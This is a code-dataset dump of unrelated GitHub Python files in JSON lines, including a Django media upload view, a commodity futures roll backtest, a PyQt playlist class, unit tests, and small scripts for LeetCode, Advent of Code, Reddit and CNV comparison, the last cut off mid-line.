yield_msg(self, params=None):\n msg = self.context.get_node_messages(self)\n return msg[0] if msg else Message('')\n\n\n################################################################################################################\n\n\ndef extract_find_train(utterance, slots, context, general=None):\n return extract_find_domain(utterance, slots, context, 'Train', map_train_slots,\n TRAIN_PREFIX, ['bookpeople', 'booktime'],\n ['departure', 'destination', 'leaveat', 'arriveby',\n 'day', 'duration', 'price','trainid'],\n general)\n\n\n\n\n","repo_name":"telepathylabsai/OpenDF","sub_path":"opendf/applications/multiwoz_2_2/nodes/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":39958,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"91"} +{"seq_id":"16454934287","text":"import unittest\nfrom data_operations import DataOperations\n\nclass TestDataOperations(unittest.TestCase):\n def setUp(self):\n # Data for testing standard functionality\n self.csv_data = [\n {'user_id': '1', 'date': '01/01/2020', 'quantity': '2,5'},\n {'user_id': '2', 'date': '02/01/2020', 'quantity': '3,0'},\n # Add more test data as needed\n ]\n\n # Data for testing the new method\n self.csv_data_for_conditions = [\n {'Usuário': '1', 'Idade': '30', 'Sexo': 'M', 'Farmacêutico': 'A', 'Cenário': 'X', 'Date': '01/01/2020', 'Quantity': '2,5'},\n {'Usuário': '1', 'Idade': '32', 'Sexo': 'M', 'Farmacêutico': 'A', 'Cenário': 'X', 'Date': '02/01/2020', 'Quantity': '3,0'},\n {'Usuário': '2', 'Idade': '25', 'Sexo': 'F', 'Farmacêutico': 'B', 'Cenário': 'Y', 'Date': '03/01/2020', 'Quantity': '1,5'},\n # Additional test data as needed\n ]\n self.PDC = {'1': 'PDC1', '2': 'PDC2'}\n\n # Initialize DataOperations instances for different tests\n self.data_ops = DataOperations(self.csv_data, 'user_id', 'date', 'quantity', 'age', 'sex', 'pharmacist', 'scenario', self.PDC, 1)\n self.data_ops_with_conditions = DataOperations(\n self.csv_data_for_conditions, 'Usuário', 'Date', 'Quantity', 'Idade', 'Sexo', 'Farmacêutico', 'Cenário', self.PDC, 1)\n\n def test_initialization(self):\n self.assertEqual(self.data_ops.user_id_col, 'user_id')\n self.assertEqual(self.data_ops.date_col, 'date')\n self.assertEqual(self.data_ops.quantity_col, 'quantity')\n self.assertEqual(self.data_ops.min_dispensations, 1)\n\n def test_parse_user_id(self):\n row = {'user_id': '123', 'date': '01/01/2020', 'quantity': '2,5'}\n self.assertEqual(self.data_ops._parse_user_id(row), '123')\n\n def test_convert_date(self):\n self.assertEqual(self.data_ops._convert_date('01/01/2020').isoformat(), '2020-01-01')\n\n def test_convert_quantity_to_float(self):\n self.assertEqual(self.data_ops._convert_quantity_to_float('2,5'), 2.5)\n\n def test_aggregate_records(self):\n self.data_ops._aggregate_records()\n self.assertIn('1', self.data_ops._user_medication)\n self.assertIn('2', self.data_ops._user_medication)\n\n def test_create_valid_users(self):\n valid_users = self.data_ops.create_valid_users()\n self.assertIn('1', valid_users)\n self.assertIn('2', valid_users)\n\n def test_process_user_data_with_conditions(self):\n processed_data = self.data_ops_with_conditions.process_user_data_with_conditions()\n\n expected_output = [\n {'Usuário': '1', 'Idade': 32, 'Sexo': 'M', 'Farmacêutico': 'A', 'Cenário': 'X', 'PDC': 'PDC1'},\n {'Usuário': '2', 'Idade': 25, 'Sexo': 'F', 'Farmacêutico': 'B', 'Cenário': 'Y', 'PDC': 'PDC2'},\n # Add expected output for other test scenarios\n ]\n\n self.assertEqual(processed_data, expected_output)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"samuel-marafigo/PDC_calculator","sub_path":"tests/test_data_operations.py","file_name":"test_data_operations.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"} +{"seq_id":"43642936443","text":"from setuptools import setup\n\ntests_require = []\n\nsetup(name='accesslog',\n version='0.7',\n description='Tool which helps parse access logs into useful blobs.',\n url='http://github.com/andrewguy9/accesslog',\n author='andrew thomson',\n author_email='athomsonguy@gmail.com',\n license='MIT',\n packages=['accesslog'],\n install_requires = [],\n tests_require=tests_require,\n extras_require={'test': tests_require},\n entry_points = {\n 'console_scripts': [\n 'log2dict = accesslog.ui:main'\n ],\n },\n zip_safe=False)\n","repo_name":"andrewguy9/accesslog","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"37614842812","text":"class Solution(object):\n def canFinish(self, numCourses, prerequisites):\n \"\"\"\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: bool\n \"\"\"\n self.course = [[0] * numCourses for i in range(numCourses)]\n self.rudu = [0] * numCourses\n queue = []\n for pair in prerequisites:\n self.course[pair[0]][pair[1]] = 1\n self.rudu[pair[1]] += 1\n for i in range(numCourses):\n if self.rudu[i] == 0:\n queue.append(i)\n cnt = numCourses\n while queue:\n i = queue.pop()\n cnt -= 1\n for j in range(numCourses):\n if self.course[i][j]:\n self.rudu[j] -= 1\n if self.rudu[j] == 0:\n queue.append(j)\n return cnt == 0\n\n\nprint(Solution().canFinish(3, [[1, 0], [1, 2], [0, 1]]))\n","repo_name":"gtxmobile/leetcode","sub_path":"208. 实现Trie.py","file_name":"208. 实现Trie.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"72310848944","text":"from django import forms\nfrom django.contrib import messages\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.http import Http404, HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.views.generic import View\n\nfrom media_manager.models import MediaFile\n\nclass MediaUploadForm(forms.Form):\n media = forms.FileField(label = 'The media you want to upload')\n\ndef get_model(app_label, model, id):\n try:\n model_type = ContentType.objects.get(app_label = app_label, \n model = model.lower())\n model = model_type.get_object_for_this_type(id = id)\n\n return model\n except ObjectDoesNotExist:\n raise Http404\n\nclass MediaUpload(View):\n def post(self, request, **kwargs):\n form = MediaUploadForm(request.POST, request.FILES)\n model = get_model(kwargs['app_label'], kwargs['model'], kwargs['id'])\n\n redir_url = request.GET.get('redir_url', '/')\n permStr = '{0}.add_media_to_{1}'.format(model._meta.app_label, \n model.__class__.__name__.lower())\n \n if not form.is_valid():\n messages.warning(request, 'No file to upload')\n elif not request.user.has_perm(permStr):\n messages.error(request, 'Missing permissions')\n else:\n media = MediaFile(content_object = model,\n media = request.FILES['media'], \n filename = request.FILES['media'].name)\n media.save()\n\n messages.success(request, 'Media uploaded successfully')\n\n return HttpResponseRedirect(redir_url)\n","repo_name":"Alaxe/judgeSystem","sub_path":"media_manager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"91"} +{"seq_id":"44361034558","text":"import sys\n\nimport numpy as np\n\n\ndef flood(fld):\n q = {(0,0,0)}\n v = lambda fi: all(0 <= i < s for i, s in zip(fi, fld.shape))\n while q:\n i, j, k = q.pop()\n val = fld[i, j, k]\n for di, dj, dk in ((-1, 0, 0), (1, 0, 0), (0, -1, 0), (0, 1, 0), (0, 0, -1), (0, 0, 1)):\n fi = (i+di, j+dj, k+dk)\n if v(fi) and fld[fi] == val:\n q.add(fi)\n fld[i, j, k] = 1\n return fld\n \n\nif __name__ == \"__main__\":\n\n indices = []\n with open(sys.argv[1], 'rt') as input_file:\n for line in input_file:\n indices.append([int(v) for v in line.strip().split(',')])\n indices = np.asarray(indices, dtype=int)\n xmax, ymax, zmax = indices.max(axis=0)\n\n grid = np.zeros((xmax+3, ymax+3, zmax+3), dtype=int)\n grid[indices[:, 0]+1, indices[:, 1]+1, indices[:, 2]+1] = 1\n faces = np.count_nonzero(np.diff(grid, axis=0)) + \\\n np.count_nonzero(np.diff(grid, axis=1)) + \\\n np.count_nonzero(np.diff(grid, axis=2))\n\n print(\"Non-zero elements: \", np.count_nonzero(grid))\n print(\"Face count: \", faces)\n\n filled = flood(grid.copy())\n filled[filled == 1] = -1\n filled[filled == 0] = 1\n filled[filled == -1] = 0\n grid += filled\n\n faces = np.count_nonzero(np.diff(grid, axis=0)) + \\\n np.count_nonzero(np.diff(grid, axis=1)) + \\\n np.count_nonzero(np.diff(grid, axis=2))\n print(\"Face count (internal voids excluded): \", faces)\n","repo_name":"michaeluhl/aoc2022","sub_path":"18/problem_18.py","file_name":"problem_18.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"25686586576","text":"from fhdataapi import BBG\nimport pandas as pd\nfrom datetime import timedelta\nfrom pandas.tseries.offsets import BDay\nimport matplotlib.pyplot as plt\nimport math\n\ndef get_contracts(d,contract_list,roll_schedule,comm_bbg_code):\n\n month_letter = roll_schedule[d.month-1] if roll_schedule[d.month-1].find('+')==-1 else roll_schedule[d.month-1][0]\n year_int = d.year if roll_schedule[d.month-1].find('+')==-1 else d.year + 1\n contract_rolling_out = comm_bbg_code + month_letter + str(year_int)[-2:] + ' Comdty'\n if contract_rolling_out not in contract_list:\n contract_rolling_out = comm_bbg_code + month_letter + str(year_int)[-1] + ' Comdty'\n\n d2 = d.replace(day=28) + timedelta(days=4)\n month_letter = roll_schedule[d2.month-1] if roll_schedule[d2.month-1].find('+')==-1 else roll_schedule[d2.month-1][0]\n year_int = d2.year if roll_schedule[d2.month-1].find('+')==-1 else d2.year + 1\n contract_rolling_in = comm_bbg_code + month_letter + str(year_int)[-2:] + ' Comdty'\n if contract_rolling_in not in contract_list:\n contract_rolling_in = comm_bbg_code + month_letter + str(year_int)[-1] + ' Comdty'\n\n return contract_rolling_out,contract_rolling_in\n\ndef get_contract_weights(d,calendar,roll_start_bday=5,roll_window_size=5,roll_type='standard'):\n days_in_the_month = [x for x in calendar if x.month == d.month and x.year == d.year]\n if roll_type == 'standard':\n start_idx = roll_start_bday - 1\n end_idx = roll_start_bday + roll_window_size - 2\n roll_start_date = days_in_the_month[start_idx] if len(days_in_the_month) > start_idx else days_in_the_month[-1]\n roll_end_date = days_in_the_month[end_idx] if len(days_in_the_month) > end_idx else days_in_the_month[-1]\n elif roll_type == 'backward_from_month_end':\n roll_start_date = days_in_the_month[roll_start_bday]\n roll_end_date = days_in_the_month[-1]\n\n if d < roll_start_date:\n weight_out = 1\n elif d > roll_end_date:\n weight_out = 0\n else:\n weight_out = float(len([x for x in days_in_the_month if x > d\n and x <= roll_end_date])) / float(roll_window_size)\n\n return [weight_out, 1 - weight_out]\n\nbbg = BBG()\n\n\nstart_date = (pd.to_datetime('2002-01-05') + BDay(1)).date() # for the data\nend_date = pd.to_datetime('today').date()\n\ncomm_bbg_code = 'CL'\nroll_start_bday = 5\nroll_window_size = 5\nroll_schedule = ['H','K','K','N','N','U','U','X','X','F+','F+','H+']\n\nwriter = pd.ExcelWriter(r'G:\\Gustavo Amarante\\Aulas\\df_' + comm_bbg_code + ' v2.xlsx')\n\n# all contracts\ncontract_list = bbg.fetch_futures_list(generic_ticker=comm_bbg_code + '1 Comdty')\n\n# first notice date for the contract\ndf_fn = bbg.fetch_contract_parameter(securities=contract_list, field='FUT_NOTICE_FIRST').sort_values('FUT_NOTICE_FIRST')\ndf_fn.to_excel(writer,'first_notice')\n\n# Grab all contract series\ndf_prices = bbg.fetch_series(securities=contract_list,\n fields='PX_LAST',\n startdate=start_date,\n enddate=end_date)\ndf_prices = df_prices.fillna(method='ffill')\n\ndf_prices.to_excel(writer,'prices')\n\n# sets up the dataframe that will hold our results\nback_start_date = df_prices.loc[df_prices.index[0].replace(day=28) + timedelta(days=4):].index[0] # start on 1st\n # bday of month\ndf_tracker = pd.DataFrame(index=df_prices.loc[back_start_date:].index,\n columns=['contract_rolling_out', 'contract_rolling_in',\n 'price_out_today', 'price_in_today','price_out_yst','price_in_yst',\n 'w_out','w_in',\n 'holdings_out','holdings_in',\n 'er_index'])\n\n# initialize\ndf_tracker.loc[back_start_date, 'er_index'] = 100\n\ncontract_rolling_out, contract_rolling_in = get_contracts(back_start_date,df_fn.index,roll_schedule,comm_bbg_code)\nprice_out = df_prices.loc[back_start_date,contract_rolling_out]\nprice_in = df_prices.loc[back_start_date,contract_rolling_in]\ndf_tracker.loc[back_start_date, 'contract_rolling_out'] = contract_rolling_out\ndf_tracker.loc[back_start_date, 'contract_rolling_in'] = contract_rolling_in\ndf_tracker.loc[back_start_date, 'price_out_today'] = price_out\ndf_tracker.loc[back_start_date, 'price_in_today'] = price_in\n\nweights = get_contract_weights(back_start_date,df_prices.index,roll_start_bday=roll_start_bday,roll_window_size=roll_window_size)\ndf_tracker.loc[back_start_date, 'w_out'] = weights[0]\ndf_tracker.loc[back_start_date, 'w_in'] = weights[1]\n\nholdings_out = weights[0]*df_tracker.loc[back_start_date, 'er_index']/price_out\nholdings_in = weights[1]*df_tracker.loc[back_start_date, 'er_index']/price_in\nholdings_out = 0 if math.isnan(holdings_out) else holdings_out\nholdings_in = 0 if math.isnan(holdings_in) else holdings_in\n\ndf_tracker.loc[back_start_date, 'holdings_out'] = holdings_out\ndf_tracker.loc[back_start_date, 'holdings_in'] = holdings_in\n\nfor d, dm1 in zip(df_tracker.index[1:], df_tracker.index[:-1]):\n\n df_tracker.loc[d, 'w_out'] = weights[0]\n df_tracker.loc[d, 'w_in'] = weights[1]\n\n df_tracker.loc[d, 'contract_rolling_out'] = contract_rolling_out\n df_tracker.loc[d, 'contract_rolling_in'] = contract_rolling_in\n\n price_out_d = df_prices[contract_rolling_out].loc[:d].iloc[-1]\n price_out_dm1 = df_prices[contract_rolling_out].loc[:d].iloc[-2]\n price_in_d = df_prices[contract_rolling_in].loc[:d].iloc[-1]\n price_in_dm1 = df_prices[contract_rolling_in].loc[:d].iloc[-2]\n\n df_tracker.loc[d, 'price_out_today'] = price_out_d\n df_tracker.loc[d, 'price_in_today'] = price_in_d\n\n df_tracker.loc[d, 'price_out_yst'] = price_out_dm1\n df_tracker.loc[d, 'price_in_yst'] = price_in_dm1\n\n df_tracker.loc[d, 'holdings_out'] = holdings_out\n df_tracker.loc[d, 'holdings_in'] = holdings_in\n\n if weights[1]==1:\n pnl = holdings_in * (price_in_d - price_in_dm1)\n else:\n pnl = holdings_in * (price_in_d - price_in_dm1) + holdings_out * (price_out_d - price_out_dm1)\n\n df_tracker.loc[d, 'er_index'] = df_tracker.loc[dm1, 'er_index'] + pnl\n\n contract_rolling_out, contract_rolling_in = get_contracts(d, df_fn.index, roll_schedule, comm_bbg_code)\n\n if d.month != dm1.month:\n holdings_out = holdings_in\n holdings_in = 0\n weights = [1,0]\n\n price_out_d = df_prices[contract_rolling_out].loc[:d].iloc[-1]\n price_out_dm1 = df_prices[contract_rolling_out].loc[:d].iloc[-2]\n price_in_d = df_prices[contract_rolling_in].loc[:d].iloc[-1]\n price_in_dm1 = df_prices[contract_rolling_in].loc[:d].iloc[-2]\n\n df_tracker.loc[d, 'holdings_out'] = holdings_out\n df_tracker.loc[d, 'holdings_in'] = holdings_in\n df_tracker.loc[d, 'w_out'] = weights[0]\n df_tracker.loc[d, 'w_in'] = weights[1]\n df_tracker.loc[d, 'price_out_today'] = price_out_d\n df_tracker.loc[d, 'price_in_today'] = price_in_d\n df_tracker.loc[d, 'price_out_yst'] = price_out_dm1\n df_tracker.loc[d, 'price_in_yst'] = price_in_dm1\n df_tracker.loc[d, 'contract_rolling_out'] = contract_rolling_out\n df_tracker.loc[d, 'contract_rolling_in'] = contract_rolling_in\n\n else:\n\n weights = get_contract_weights(d, df_prices.index, roll_start_bday=roll_start_bday,\n roll_window_size=roll_window_size)\n\n holdings_out = weights[0] * df_tracker.loc[d, 'er_index'] / price_out_d\n holdings_in = weights[1] * df_tracker.loc[d, 'er_index'] / price_in_d\n holdings_out = 0 if math.isnan(holdings_out) else holdings_out\n holdings_in = 0 if math.isnan(holdings_in) else holdings_in\n\ndf = df_tracker.dropna(how='all')\n\ndf.to_excel(writer,'backtest')\nwriter.save()\n\n","repo_name":"RafaelPeon/TrabInsper","sub_path":"build_comm_futures_tracker_v2.py","file_name":"build_comm_futures_tracker_v2.py","file_ext":"py","file_size_in_byte":7883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"26582141214","text":"import webbrowser\n\nfrom book_resources import *\nfrom ui import UserInterface, ConsoleUI\n\n# installed modules:\n# BeautifulSoup4\n# requests\n\n\nclass Application:\n def __init__(self, ui: UserInterface):\n search_results_limit = 5\n\n self.__ui = ui\n self.__resources: List[BookResource] = [\n ManyBooksResource(search_results_limit),\n # FreeComputerBooksResource(search_results_limit),\n FreeEBooksResource(search_results_limit)\n ]\n self.strict_mode = False\n\n self.__ui.hooks['on_strict_mode_enabled'] = self.enable_strict_mode\n self.__ui.hooks['on_strict_mode_disabled'] = self.disable_strict_mode\n\n def enable_strict_mode(self):\n self.strict_mode = True\n\n def disable_strict_mode(self):\n self.strict_mode = False\n\n def start(self):\n self.__ui.show_intro()\n\n while True:\n book_name = self.__ui.ask_book_name()\n search_results = self.search(book_name)\n\n self.__ui.show_search_results(search_results)\n\n while True:\n result_number = self.__ui.ask_search_result_number(len(search_results))\n\n if result_number == 0:\n break\n\n book_to_open = search_results[result_number - 1]\n webbrowser.open(book_to_open.url)\n\n def search(self, book_name: str) -> List[BookSearchResult]:\n results = []\n\n for resource in self.__resources:\n search_results = resource.search(book_name, self.strict_mode)\n results.extend(search_results)\n\n return results\n\n\napp = Application(ConsoleUI())\napp.start()\n","repo_name":"s11114204/book-finder","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"6312585109","text":"#!/usr/bin/python3\n\"\"\"prints the titles of the first 10 hot posts \"\"\"\nfrom requests import get\n\n\ndef top_ten(subreddit):\n \"\"\"Retrieves the title of the top ten posts from a given subreddit.\"\"\"\n url = 'https://www.reddit.com'\n headers = {\n 'Accept': 'application/json',\n 'User-Agent': ' '.join([\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',\n 'AppleWebKit/537.36 (KHTML, like Gecko)',\n 'Chrome/97.0.4692.71',\n 'Safari/537.36',\n 'Edg/97.0.1072.62'\n ])\n }\n sort = 'top'\n limit = 10\n res = get(\n '{}/r/{}/.json?sort={}&limit={}'.format(\n url,\n subreddit,\n sort,\n limit\n ),\n headers=headers,\n allow_redirects=False\n )\n if res.status_code == 200:\n for post in res.json()['data']['children'][0:10]:\n print(post['data']['title'])\n else:\n print(None)\n","repo_name":"mgmtsweni/alx-system_engineering-devops","sub_path":"0x16-api_advanced/1-top_ten.py","file_name":"1-top_ten.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"} +{"seq_id":"36622630934","text":"# coding:utf-8\n\nfrom random import shuffle\nfrom enum import Enum\nfrom json import dump, load\n\nfrom PyQt5.Qt import QUrl, pyqtSignal\nfrom PyQt5.QtMultimedia import QMediaContent, QMediaPlaylist\n\n\nclass PlaylistType(Enum):\n \"\"\" 播放列表种类枚举 \"\"\"\n SONG_CARD_PLAYLIST = 0 # 播放列表为一首歌\n SONGER_CARD_PLAYLIST = 1 # 播放列表为选中歌手的歌\n ALBUM_CARD_PLAYLIST = 2 # 播放列表为选中专辑的歌\n LAST_PLAYLIST = 3 # 上一次的播放列表\n NO_PLAYLIST = 4 # 没有播放列表\n CUSTOM_PLAYLIST = 5 # 自定义播放列表\n ALL_SONG_PLAYLIST = 6 # 播放列表为歌曲文件夹中的所有歌曲\n\n\nclass MediaPlaylist(QMediaPlaylist):\n \"\"\" 播放列表类 \"\"\"\n # 当播放列表的当前下标变化时发送信号,用于更新主界面\n switchSongSignal = pyqtSignal(dict)\n\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n # 创建一个用于存储顺序播放列表的列表\n self.playlist = []\n # 保存当前的歌曲在随机播放列表中的下标\n self.currentRandomPlayIndex = 0\n # 初始化播放列表种类\n self.playlistType = PlaylistType(PlaylistType.LAST_PLAYLIST)\n # 初始化播放列表\n self.__initPlaylist()\n\n def __initPlaylist(self):\n \"\"\" 初始化播放列表 \"\"\"\n # 设置播放模式为列表顺序播放\n self.setPlaybackMode(QMediaPlaylist.Sequential)\n # 记录下随机播放前的循环模式\n self.prePlayMode = self.playbackMode()\n # 初始化随机播放按钮按下状态\n self.randPlayBtPressed = False\n # 读入上次的播放列表\n self.__readLastPlaylist()\n if self.playlist:\n for songInfo_dict in self.playlist:\n super().addMedia(QMediaContent(\n QUrl.fromLocalFile(songInfo_dict['songPath'])))\n self.currentIndexChanged.connect(\n lambda index: self.switchSongSignal.emit(self.playlist[index]))\n\n def addMedia(self, songInfo_dict: dict):\n \"\"\" 重载addMedia,一次向尾部添加一首歌 \"\"\"\n if not songInfo_dict:\n return\n self.playlist.append(songInfo_dict)\n super().addMedia(QMediaContent(\n QUrl.fromLocalFile(songInfo_dict['songPath'])))\n\n def addMedias(self, songInfoDict_list: list):\n \"\"\" 向尾部添加要播放的音频文件列表 \"\"\"\n if not songInfoDict_list:\n return\n self.playlist.extend(songInfoDict_list)\n for songInfo_dict in songInfoDict_list:\n super().addMedia(QMediaContent(\n QUrl.fromLocalFile(songInfo_dict['songPath'])))\n\n def insertMedia(self, index, songInfo_dict: dict):\n \"\"\" 在指定位置插入要播放的歌曲 \"\"\"\n super().insertMedia(index, QMediaContent(\n QUrl.fromLocalFile(songInfo_dict['songPath'])))\n self.playlist.insert(index, songInfo_dict)\n\n def insertMedias(self, index: int, songInfoDict_list: list):\n \"\"\" 插入播放列表 \"\"\"\n if not songInfoDict_list:\n return\n self.playlist = self.playlist[:index] + \\\n songInfoDict_list + self.playlist[index:]\n mediaContent_list = [QMediaContent(\n QUrl.fromLocalFile(songInfo_dict['songPath'])) for songInfo_dict in songInfoDict_list]\n super().insertMedia(index, mediaContent_list)\n\n def clear(self):\n \"\"\" 清空播放列表 \"\"\"\n self.playlist.clear()\n super().clear()\n\n def next(self):\n \"\"\" 播放下一首 \"\"\"\n # 如果已经是最后一首就转到第一首歌开始播放\n if self.currentIndex() == self.mediaCount() - 1:\n # 列表循环时切换到第一首\n if self.playbackMode() == QMediaPlaylist.Loop:\n self.setCurrentIndex(0)\n # 切换歌曲时发出信号\n self.switchSongSignal.emit(self.playlist[self.currentIndex()])\n elif self.playbackMode() == QMediaPlaylist.Random:\n super().next()\n else:\n super().next()\n # 切换歌曲时发出信号\n self.switchSongSignal.emit(self.playlist[self.currentIndex()])\n\n def previous(self):\n \"\"\" 播放上一首 \"\"\"\n # 如果是第一首就转到最后一首歌开始播放\n if self.currentIndex() == 0:\n if self.playbackMode() == QMediaPlaylist.Loop:\n self.setCurrentIndex(self.mediaCount() - 1)\n self.switchSongSignal.emit(self.playlist[self.currentIndex()])\n else:\n super().previous()\n self.switchSongSignal.emit(self.playlist[self.currentIndex()])\n\n def setCurrentSong(self, songInfo_dict: dict):\n \"\"\" 按下歌曲卡的播放按钮或者双击歌曲卡时立即在当前的播放列表中播放这首歌 \"\"\"\n if not songInfo_dict:\n return\n # 设置当前播放歌曲\n self.setCurrentIndex(self.playlist.index(songInfo_dict))\n\n def playAlbum(self, songInfoDict_list: list):\n \"\"\" 播放专辑中的歌曲 \"\"\"\n self.playlistType = PlaylistType.ALBUM_CARD_PLAYLIST\n self.setPlaylist(songInfoDict_list)\n\n def setRandomPlay(self, isRandomPlay=False):\n \"\"\" 按下随机播放按钮时根据循环模式决定是否设置随机播放模式 \"\"\"\n if isRandomPlay:\n self.randPlayBtPressed = True\n # 记录按下随机播放前的循环模式\n self.prePlayMode = self.playbackMode()\n # 不处于单曲循环模式时就设置为随机播放\n if self.playbackMode() != QMediaPlaylist.CurrentItemInLoop:\n self.setPlaybackMode(QMediaPlaylist.Random)\n else:\n self.randPlayBtPressed = False\n # 恢复之前的循环模式\n self.setPlaybackMode(self.prePlayMode)\n\n def setPlaylist(self, songInfoDict_list: list):\n \"\"\" 重置播放列表 \"\"\"\n if songInfoDict_list == self.playlist:\n return\n self.clear()\n self.addMedias(songInfoDict_list)\n self.setCurrentIndex(0)\n\n def save(self):\n \"\"\" 保存关闭前的播放列表到json文件中 \"\"\"\n with open('Data\\\\lastPlaylist.json', 'w', encoding='utf-8') as f:\n dump(self.playlist, f)\n\n def __readLastPlaylist(self):\n \"\"\" 从json文件中读取播放列表 \"\"\"\n try:\n with open('Data\\\\lastPlaylist.json', encoding='utf-8') as f:\n self.playlist = load(f)\n except:\n self.playlist = []\n\n def removeMedia(self, index):\n \"\"\" 在播放列表中移除歌曲 \"\"\"\n currentIndex = self.currentIndex()\n if currentIndex > index:\n currentIndex -= 1\n self.playlist.pop(index)\n super().removeMedia(index)\n self.setCurrentIndex(currentIndex)\n\n def updateOneSongInfo(self, oldSongInfo: dict, newSongInfo: dict):\n \"\"\" 更新播放列表中一首歌曲的信息 \"\"\"\n if oldSongInfo in self.playlist:\n index = self.playlist.index(oldSongInfo)\n self.playlist[index] = newSongInfo\n\n def updateMultiSongInfo(self, oldSongInfo_list: list, newSongInfo_list: list):\n \"\"\" 更新播放列表中多首歌曲的信息 \"\"\"\n for oldSongInfo, newSongInfo in zip(oldSongInfo_list, newSongInfo_list):\n self.updateOneSongInfo(oldSongInfo, newSongInfo)\n","repo_name":"imfog/Groove","sub_path":"media_player/media_playlist.py","file_name":"media_playlist.py","file_ext":"py","file_size_in_byte":7501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"73048485422","text":"#!/usr/bin/env python\nimport os\nimport argparse\n\n# Import required classes\nfrom classes.arraycnv import ArrayCnv\nfrom classes.conifercall import ConiferCall\nfrom classes.gatkcall import GatkCall\n\n# Import comparison scripts\nimport comparison.comparison as comcom\n\n# Import parameter scripts\nimport parameters.parameters as parpar\n\n# Import util scripts\nimport utils.filereaders as ufr\nimport utils.filewriters as ufw\n\n\n#Make some parameter defining variables\nTOOL_CHOICES = [\"arraycnvs\", \"false_positives\", \"true_positives\"]\nREQUIRED_PARAMS = {\"arraycnvs\": [\"arraycnvs\", \"file1\", \"file2\", \"label1\", \"label2\", \"outdir\", \"output-prefix\"],\n \"false_positives\": [\"file1\", \"file2\", \"label1\", \"label2\", \"outdir\", \"output-prefix\"],\n \"true_positives\": [\"file1\", \"file2\", \"label1\", \"label2\", \"outdir\", \"output-prefix\"]}\nOPTIONAL_PARAMS = {}\nPARAM_TYPES = {\"arraycnvs\": \"inputfile\",\n \"file1\": \"inputfile\",\n \"file2\": \"inputfile\",\n \"label1\": \"string\",\n \"label2\": \"string\",\n \"outdir\": \"directory\",\n \"output-prefix\": \"string\"}\nTOOL_USAGE = {\"conifer_exomedepth\": \"python comparison.py -t conifer_exomedepth -c conifer_classifcations.txt -e exomedepth_classifications.txt -o comparison_outdir -op conexo_comparison\",\n \"gatk4_conifer\": \"python comparison.py -t gatk4_conifer -g gatk4_classifications.txt -c conifer_classifications.txt -o comparison_outdir -op gatcon_comparison\",\n \"gatk4_exomedepth\": \"python comparison.py -t gatk4_exomedepth -g gatk4_classifications.txt -e exomedepth_classifications.txt -o comparison_outdir -op gatexo_comparison\",\n \"gatk4_gatk4\": \"python comparison.py -t gatk4_gatk4 -g gatk4_classifications.txt -g2 gatk4_classifications_2.txt -a array_goldstandard.txt -o comparison_outdir -op gatkgatk_comparison\",\n \"conifer_conifer\": \"python comparison.py -t conifer_conifer -c conifer_classifcations.txt -c2 conifer_classifcations_2.txt -a array_goldstandard.txt -o comparison_outdir -op concon_comparison\",\n \"exomedepth_exomedepth\": \"python comparison.py -t exomedepth_exomedepth -e exomedepth_classifications.txt -e2 exomedepth_classifications_2.txt -a array_goldstandard.txt -o comparison_outdir -op exdexd_comparison\"}\n\n\ndef main():\n compare_parameters = parpar.get_comparison_parameters(TOOL_CHOICES)\n incorrect_parameters = parpar.parameters_are_ok(compare_parameters, REQUIRED_PARAMS, PARAM_TYPES)\n\n if len(incorrect_parameters) == 0:\n tool1_label = compare_parameters[\"label1\"]\n tool2_label = compare_parameters[\"label2\"]\n print(f\"...Reading {tool1_label} classification data...\")\n tool1data = ufr.read_classification_file(compare_parameters[\"file1\"])\n print(f\"...Reading {tool2_label} classification data...\")\n tool2data = ufr.read_classification_file(compare_parameters[\"file2\"])\n\n # Perform comparison between two tools for found array CNVs\n if compare_parameters[\"tool\"] == \"arraycnvs\":\n print(\"...Reading array CNV data...\")\n arraydata = ufr.read_array_cnvs(compare_parameters[\"arraycnvs\"])\n print(f\"...Perform the comparison between {tool1_label} and {tool2_label}...\")\n comparisondata = comcom.perform_comparison(tool1_label, tool1data, tool2_label, tool2data, arraydata, compare_parameters[\"tp-per-acnv\"])\n\n outfilepath = compare_parameters[\"outdir\"] + \"/\" + compare_parameters[\"output-prefix\"] + \".txt\"\n print(f\"...Writing comparison data to output file {outfilepath}...\")\n wrote_file = ufw.write_comparison_data(outfilepath, comparisondata, tool1_label, tool2_label)\n print(f\"...Wrote comparison output file?: {wrote_file}...\")\n\n # Perform comparison between two tools for False Positives\n if compare_parameters[\"tool\"] == \"false_positives\":\n comparisondata = comcom.compare_fps(tool1_label, tool1data, tool2_label, tool2data)\n outfilepath = compare_parameters[\"outdir\"] + \"/\" + compare_parameters[\"output-prefix\"] + \".txt\"\n wrote_file = ufw.write_fp_comparison(outfilepath, comparisondata, tool1_label, tool2_label)\n print(f\"...Wrote comparison output file?: {wrote_file}...\")\n\n # Perform comparison between two tools for True Positives\n if compare_parameters[\"tool\"] == \"true_positives\":\n comparisondata = 